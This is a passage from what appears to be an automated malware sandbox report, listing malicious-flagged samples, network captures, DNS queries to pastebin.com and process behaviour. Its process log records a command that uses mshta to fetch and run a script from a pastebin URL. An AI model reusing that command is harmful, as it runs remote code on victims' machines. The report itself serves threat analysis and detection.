                            • 104.23.98.190
                            bmd3dH4o4g.ppamGet hashmaliciousBrowse
                            • 104.23.98.190
                            bmd3dH4o4g.ppamGet hashmaliciousBrowse
                            • 104.23.98.190
                            Details-7125618_20210823.xlsbGet hashmaliciousBrowse
                            • 104.23.98.190
                            p3Xn5MS40D.exeGet hashmaliciousBrowse
                            • 104.23.98.190
                            QUOTATION.ppamGet hashmaliciousBrowse
                            • 104.23.98.190
                            CONFIDENTIAL - International Conference on Military Strategies and Methods.docGet hashmaliciousBrowse
                            • 104.23.98.190
                            JudianService.dllGet hashmaliciousBrowse
                            • 104.23.98.190
                            PEDIDO 002065-0091 GRUPO INTASAL S.L.exeGet hashmaliciousBrowse
                            • 104.23.98.190
                            nd4GzpmV60.exeGet hashmaliciousBrowse
                            • 104.23.98.190
                            n2WWbWDvhk.exeGet hashmaliciousBrowse
                            • 104.23.98.190
                            GzsKHwvBmG.exeGet hashmaliciousBrowse
                            • 104.23.98.190
                            69CDTt1pad.exeGet hashmaliciousBrowse
                            • 104.23.98.190
                            New-PO-198-janne.roven.htmGet hashmaliciousBrowse
                            • 104.23.98.190
                            PO 122001-221.ppamGet hashmaliciousBrowse
                            • 104.23.98.190
                            rj2b9a7ojM.exeGet hashmaliciousBrowse
                            • 104.23.98.190
                            ORDER-111-0200657-6996224.docmGet hashmaliciousBrowse
                            • 104.23.98.190
                            Edge.jsGet hashmaliciousBrowse
                            • 104.23.98.190
                            Edge.jsGet hashmaliciousBrowse
                            • 104.23.98.190

                            Dropped Files

                            No context

                            Created / dropped Files

                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\i5mSzahw[1]
                            Process:C:\Windows\SysWOW64\mshta.exe
                            File Type:ASCII text, with CRLF line terminators
                            Category:dropped
                            Size (bytes):5
                            Entropy (8bit):1.5219280948873621
                            Encrypted:false
                            SSDEEP:3:hn:h
                            MD5:FDA44910DEB1A460BE4AC5D56D61D837
                            SHA1:F6D0C643351580307B2EAA6A7560E76965496BC7
                            SHA-256:933B971C6388D594A23FA1559825DB5BEC8ADE2DB1240AA8FC9D0C684949E8C9
                            SHA-512:57DDA9AA7C29F960CD7948A4E4567844D3289FA729E9E388E7F4EDCBDF16BF6A94536598B4F9FF8942849F1F96BD3C00BC24A75E748A36FBF2A145F63BF904C1
                            Malicious:false
                            Reputation:high, very likely benign file
                            Preview: 0....

                            Static File Info

                            No static file info

                            Network Behavior

                            Network Port Distribution

                            TCP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Aug 24, 2021 15:20:06.332938910 CEST4970680192.168.2.3104.23.98.190
                            Aug 24, 2021 15:20:06.349116087 CEST8049706104.23.98.190192.168.2.3
                            Aug 24, 2021 15:20:06.349206924 CEST4970680192.168.2.3104.23.98.190
                            Aug 24, 2021 15:20:06.349721909 CEST4970680192.168.2.3104.23.98.190
                            Aug 24, 2021 15:20:06.365735054 CEST8049706104.23.98.190192.168.2.3
                            Aug 24, 2021 15:20:06.374855042 CEST8049706104.23.98.190192.168.2.3
                            Aug 24, 2021 15:20:06.374970913 CEST4970680192.168.2.3104.23.98.190
                            Aug 24, 2021 15:20:06.382392883 CEST49707443192.168.2.3104.23.98.190
                            Aug 24, 2021 15:20:06.398643970 CEST44349707104.23.98.190192.168.2.3
                            Aug 24, 2021 15:20:06.398750067 CEST49707443192.168.2.3104.23.98.190
                            Aug 24, 2021 15:20:06.421760082 CEST49707443192.168.2.3104.23.98.190
                            Aug 24, 2021 15:20:06.439296961 CEST44349707104.23.98.190192.168.2.3
                            Aug 24, 2021 15:20:06.443039894 CEST44349707104.23.98.190192.168.2.3
                            Aug 24, 2021 15:20:06.443064928 CEST44349707104.23.98.190192.168.2.3
                            Aug 24, 2021 15:20:06.443106890 CEST49707443192.168.2.3104.23.98.190
                            Aug 24, 2021 15:20:06.443141937 CEST49707443192.168.2.3104.23.98.190
                            Aug 24, 2021 15:20:06.504663944 CEST49707443192.168.2.3104.23.98.190
                            Aug 24, 2021 15:20:06.521048069 CEST44349707104.23.98.190192.168.2.3
                            Aug 24, 2021 15:20:06.521667957 CEST44349707104.23.98.190192.168.2.3
                            Aug 24, 2021 15:20:06.521730900 CEST49707443192.168.2.3104.23.98.190
                            Aug 24, 2021 15:20:06.534980059 CEST49707443192.168.2.3104.23.98.190
                            Aug 24, 2021 15:20:06.551239967 CEST44349707104.23.98.190192.168.2.3
                            Aug 24, 2021 15:20:06.794533014 CEST44349707104.23.98.190192.168.2.3
                            Aug 24, 2021 15:20:06.794558048 CEST44349707104.23.98.190192.168.2.3
                            Aug 24, 2021 15:20:06.794694901 CEST49707443192.168.2.3104.23.98.190
                            Aug 24, 2021 15:21:56.019054890 CEST49707443192.168.2.3104.23.98.190
                            Aug 24, 2021 15:21:56.019391060 CEST4970680192.168.2.3104.23.98.190
                            Aug 24, 2021 15:21:56.035758018 CEST8049706104.23.98.190192.168.2.3
                            Aug 24, 2021 15:21:56.035800934 CEST44349707104.23.98.190192.168.2.3
                            Aug 24, 2021 15:21:56.035924911 CEST4970680192.168.2.3104.23.98.190
                            Aug 24, 2021 15:21:56.035979033 CEST49707443192.168.2.3104.23.98.190

                            UDP Packets

                            TimestampSource PortDest PortSource IPDest IP
                            Aug 24, 2021 15:19:57.599718094 CEST5864353192.168.2.38.8.8.8
                            Aug 24, 2021 15:19:57.635255098 CEST53586438.8.8.8192.168.2.3
                            Aug 24, 2021 15:19:58.993309975 CEST6098553192.168.2.38.8.8.8
                            Aug 24, 2021 15:19:59.034188986 CEST53609858.8.8.8192.168.2.3
                            Aug 24, 2021 15:19:59.059933901 CEST5020053192.168.2.38.8.8.8
                            Aug 24, 2021 15:19:59.096115112 CEST53502008.8.8.8192.168.2.3
                            Aug 24, 2021 15:20:01.370290995 CEST5128153192.168.2.38.8.8.8
                            Aug 24, 2021 15:20:01.404117107 CEST53512818.8.8.8192.168.2.3
                            Aug 24, 2021 15:20:06.280817986 CEST4919953192.168.2.38.8.8.8
                            Aug 24, 2021 15:20:06.318922997 CEST53491998.8.8.8192.168.2.3
                            Aug 24, 2021 15:20:29.097012043 CEST5062053192.168.2.38.8.8.8
                            Aug 24, 2021 15:20:29.137916088 CEST53506208.8.8.8192.168.2.3
                            Aug 24, 2021 15:20:32.789983988 CEST6493853192.168.2.38.8.8.8
                            Aug 24, 2021 15:20:32.825045109 CEST53649388.8.8.8192.168.2.3
                            Aug 24, 2021 15:20:50.564847946 CEST6015253192.168.2.38.8.8.8
                            Aug 24, 2021 15:20:50.611614943 CEST53601528.8.8.8192.168.2.3
                            Aug 24, 2021 15:20:53.179208994 CEST5754453192.168.2.38.8.8.8
                            Aug 24, 2021 15:20:53.223295927 CEST53575448.8.8.8192.168.2.3
                            Aug 24, 2021 15:21:07.340607882 CEST5598453192.168.2.38.8.8.8
                            Aug 24, 2021 15:21:07.376796007 CEST53559848.8.8.8192.168.2.3
                            Aug 24, 2021 15:21:10.140362978 CEST6418553192.168.2.38.8.8.8
                            Aug 24, 2021 15:21:10.177571058 CEST53641858.8.8.8192.168.2.3
                            Aug 24, 2021 15:21:44.867356062 CEST6511053192.168.2.38.8.8.8
                            Aug 24, 2021 15:21:44.899879932 CEST53651108.8.8.8192.168.2.3
                            Aug 24, 2021 15:21:47.522078037 CEST5836153192.168.2.38.8.8.8
                            Aug 24, 2021 15:21:47.558231115 CEST53583618.8.8.8192.168.2.3

                            DNS Queries

                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                            Aug 24, 2021 15:19:57.599718094 CEST192.168.2.38.8.8.80xe584Standard query (0)clientconfig.passport.netA (IP address)IN (0x0001)
                            Aug 24, 2021 15:20:06.280817986 CEST192.168.2.38.8.8.80x9d6fStandard query (0)pastebin.comA (IP address)IN (0x0001)

                            DNS Answers

                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                            Aug 24, 2021 15:19:57.635255098 CEST8.8.8.8192.168.2.30xe584No error (0)clientconfig.passport.netauthgfx.msa.akadns6.netCNAME (Canonical name)IN (0x0001)
                            Aug 24, 2021 15:20:06.318922997 CEST8.8.8.8192.168.2.30x9d6fNo error (0)pastebin.com104.23.98.190A (IP address)IN (0x0001)
                            Aug 24, 2021 15:20:06.318922997 CEST8.8.8.8192.168.2.30x9d6fNo error (0)pastebin.com104.23.99.190A (IP address)IN (0x0001)

                            HTTP Request Dependency Graph

                            • pastebin.com

                            HTTP Packets

                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            0192.168.2.349706104.23.98.19080C:\Windows\SysWOW64\mshta.exe
                            TimestampkBytes transferredDirectionData
                            Aug 24, 2021 15:20:06.349721909 CEST1084OUTGET /raw/i5mSzahw HTTP/1.1
                            Accept: */*
                            Accept-Language: en-US
                            Accept-Encoding: gzip, deflate
                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                            Host: pastebin.com
                            Connection: Keep-Alive
                            Aug 24, 2021 15:20:06.374855042 CEST1130INHTTP/1.1 301 Moved Permanently
                            Date: Tue, 24 Aug 2021 13:20:06 GMT
                            Transfer-Encoding: chunked
                            Connection: keep-alive
                            Cache-Control: max-age=3600
                            Expires: Tue, 24 Aug 2021 14:20:06 GMT
                            Location: https://pastebin.com/raw/i5mSzahw
                            Server: cloudflare
                            CF-RAY: 683ce047ba8e536a-FRA
                            Data Raw: 30 0d 0a 0d 0a
                            Data Ascii: 0


                            HTTPS Packets

                            TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                            Aug 24, 2021 15:20:06.443064928 CEST104.23.98.190443192.168.2.349707CN=sni.cloudflaressl.com, O="Cloudflare, Inc.", L=San Francisco, ST=California, C=US CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=US CN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IESat Jul 17 02:00:00 CEST 2021 Mon Jan 27 13:48:08 CET 2020Sun Jul 17 01:59:59 CEST 2022 Wed Jan 01 00:59:59 CET 2025771,49196-49195-49200-49199-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-10-11-13-35-23-65281,29-23-24,037f463bf4616ecd445d4a1937da06e19
                            CN=Cloudflare Inc ECC CA-3, O="Cloudflare, Inc.", C=USCN=Baltimore CyberTrust Root, OU=CyberTrust, O=Baltimore, C=IEMon Jan 27 13:48:08 CET 2020Wed Jan 01 00:59:59 CET 2025

                            Code Manipulations

                            Statistics

                            CPU Usage

                            Click to jump to process

                            Memory Usage

                            Click to jump to process

                            High Level Behavior Distribution

                            Click to dive into process behavior distribution

                            Behavior

                            Click to jump to process

                            System Behavior

                            General

                            Start time:15:20:03
                            Start date:24/08/2021
                            Path:C:\Windows\SysWOW64\cmd.exe
                            Wow64 process (32bit):true
                            Commandline:cmd /C 'c:\windows\system32\mshta.EXE http:\\pastebin.com\raw\i5mSzahw'
                            Imagebase:0xbd0000
                            File size:232960 bytes
                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            General

                            Start time:15:20:03
                            Start date:24/08/2021
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff6b2800000
                            File size:625664 bytes
                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            General

                            Start time:15:20:04
                            Start date:24/08/2021
                            Path:C:\Windows\SysWOW64\mshta.exe
                            Wow64 process (32bit):true
                            Commandline:c:\windows\system32\mshta.EXE http:\\pastebin.com\raw\i5mSzahw
                            Imagebase:0xe70000
                            File size:13312 bytes
                            MD5 hash:7083239CE743FDB68DFC933B7308E80A
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            Disassembly

                            Code Analysis

                            Reset < >